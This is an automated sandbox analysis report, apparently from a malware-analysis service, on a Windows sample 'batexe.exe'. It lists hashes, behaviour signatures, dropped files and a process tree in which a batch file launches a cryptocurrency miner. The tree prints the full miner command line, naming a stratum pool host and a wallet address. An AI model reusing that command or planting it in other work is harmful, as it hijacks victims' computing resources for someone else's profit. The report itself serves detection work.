Analysis
-
max time kernel
294s -
max time network
291s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
11-02-2024 15:58
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20231215-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation b2e.exe Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation batexe.exe -
Executes dropped EXE 2 IoCs
pid Process 3924 b2e.exe 620 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 620 cpuminer-sse2.exe 620 cpuminer-sse2.exe 620 cpuminer-sse2.exe 620 cpuminer-sse2.exe 620 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/2500-9-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2500 wrote to memory of 3924 2500 batexe.exe 85 PID 2500 wrote to memory of 3924 2500 batexe.exe 85 PID 2500 wrote to memory of 3924 2500 batexe.exe 85 PID 3924 wrote to memory of 1640 3924 b2e.exe 86 PID 3924 wrote to memory of 1640 3924 b2e.exe 86 PID 3924 wrote to memory of 1640 3924 b2e.exe 86 PID 1640 wrote to memory of 620 1640 cmd.exe 89 PID 1640 wrote to memory of 620 1640 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Users\Admin\AppData\Local\Temp\5C0A.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\5C0A.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\5C0A.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3924 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6060.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:620
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
11.4MB
MD5940c9a418481248f90892c7051b7733c
SHA186eafcc8862ec457c0d09e5d75294920bdb94e1d
SHA256b2568744292ab714a15f368d624838c74d8107bd4a5d773fea617609847c3e25
SHA5121920207a90a2ddf792d294118ac8102714f102ddd5a07dcf49153f5abca8e37656139f384c9196beacd547efeb67b6642ca17c0e3efa5310394531e61c7e7bb1
-
Filesize
3.7MB
MD56672d9717aad261b61a0f5827614ae5c
SHA1e0ba3a96dcb25500980c0d4276fc17904b906ef3
SHA256be6829b541cad1e06b30ba49d53e2d958fb89799de5d40f16f31f38913052ebb
SHA512dc6933a4745a4c22b9b49755c3aa07318ebcf2da443f0f1a83437fb9296c8d9afb5fee75700f4320dfdf84471da7289b62f2e00de10d87edff1676c64731c4ba
-
Filesize
2.9MB
MD52fe2cb0489c2e79f826c6b6b134e963a
SHA1e4bdff55c0438cc731090167f2c40738a8dd0250
SHA2560abc6c8927a199efefdbfed811a1c51cf73d15f6d6e25643d6bce2cc5b864472
SHA51225a1303671b1a2f7f66db0ad843c112ec3f8f8308f59d1e800abbd5931a83617977f5cab14ddd47d9a20ada58b45d7638db73aa7a1bcd6b3a234f53e1d18b78b
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
2.3MB
MD54c04147c386ba8792ac6a03069572a8a
SHA1dda67789fc1d0f2469ca95f01a5c81034853ca6a
SHA256c7739a1e940a282703d06eccda7110426d306f390e97fdbbd9df18472fd132cd
SHA512a8b5a0b878a9a7d30cb38feff814e1f4dce24d000158edc10a43ee9a89920bedf7adc92eb7e3913098b6aab7fbd0531f56fc09f508b5c2769992a94e55d153db
-
Filesize
175KB
MD5fa9e438528ae7007ffc576b004f29665
SHA1fcd6d52318ecaddd4ee3bf024a4fbfc4df73c649
SHA256d4420b621470565d53a53a2fb2e2a3980a3e3e1509988dd025d2e6fcbd465cd9
SHA512f2b2bb27e7d926e7c7054aafd0c6275293b7712b9aeb1bc7970c178fad81f6d81ec180cac42f2f9f8df3cc4c4762643a72024854bd5a150d5fe0be33d5aa5ad8
-
Filesize
256KB
MD511e8812bfa1d698cdeb73a16c1d7c963
SHA1e8708fd452ab5946b380d0c353ac26acf289e548
SHA256e0f9ddf8afd30511763f0cf792369e32c955f15d9529c00c5fe9298a80d74402
SHA512fd54c9c6f3520b2ced6b42235ebfce6d8b622c53f1fbf810baace657a7d44430968b5ff90cd1d860dbdf7550dd8cd467636c862ff0dd0832f25145efccc7731e
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
4.2MB
MD5f39652348eed6f64bfedcead8d77a264
SHA149abc2efd97ded753944d64be85792b61ea537bb
SHA256fe02987a4206a8d3aeb95ecc078261b08179ada3f70741cfffa6140ba75d6fa8
SHA51286ebc00b79925012f062ae2aa88976bd400d6678d71d19d2a9b6a7a3d381ed045b3b6eaa6d7d50be38ba525c79352aff68c3b19cc6d6b3c507e9aff78e3e0f19
-
Filesize
6.0MB
MD57ffd48ca4ebf1218dac0c066f0ed4f56
SHA1ada8b42b412fa428282d74dc83aa1f624317d133
SHA256421d1042672cdc1e7edf04ba4545a5f79bf90226e3ed664e22df5fe4419573bd
SHA512c9601daeab76418eacfdcb616da06d70b36cd9cb496b95222587eae49cc221bab2903a83278df28a03e0a8632a1c8f0e66e80eebc5bf6d04a1d747c56d714662
-
Filesize
36KB
MD51f77eeedc1105207f72974f3f0c77987
SHA1743ecd50d93ef1bdc83f58babcc50b7298db517a
SHA25616ad926c43f5cd9bc52a78dfcf4bdd6bb6b2516f7b3c9125d9322e8455356a6f
SHA512474ab93753c685e03818784e119cb5e49b8892879887c69299438d5c6cd6be4e830d8d537738a84ef9e4a0ed212cba1c69b4c742cc89abdee9fe9c327888980e
-
Filesize
128KB
MD58d949f4e279a9a80f50d7c2e0c7bff36
SHA192e29300716211895b2d8cd4cf010452f0132152
SHA2562e87614d15e62262c8b0a0c65e302b15e971b591469f3c679e7e516934cf621f
SHA51236565dc0a3290ac8c5e0fd0a2756764ce8e49a7ef52a437caad549c7ea1ac3ac7dfe05cd4951ed6b17051768fd9733c94365d85832092c429b0b74ab62a338fb
-
Filesize
50KB
MD541db138bcb79d7f21ee3d027c94cd8db
SHA17572e8369327e47a9d8e08db3a16a2ff9711f853
SHA256fb5ab0995631b4951c32c8b8a944332ad2af1f8ff675d2cb337b5eeaba0af69b
SHA512d7b52f643e4388f0acf0e9ecfc784ebffd5de2c96c0d31aede3c4586cca5d693253e76d68de582561f2a61a10040c4b24f9d14fcc9ff9e12fa8abf59dc27a070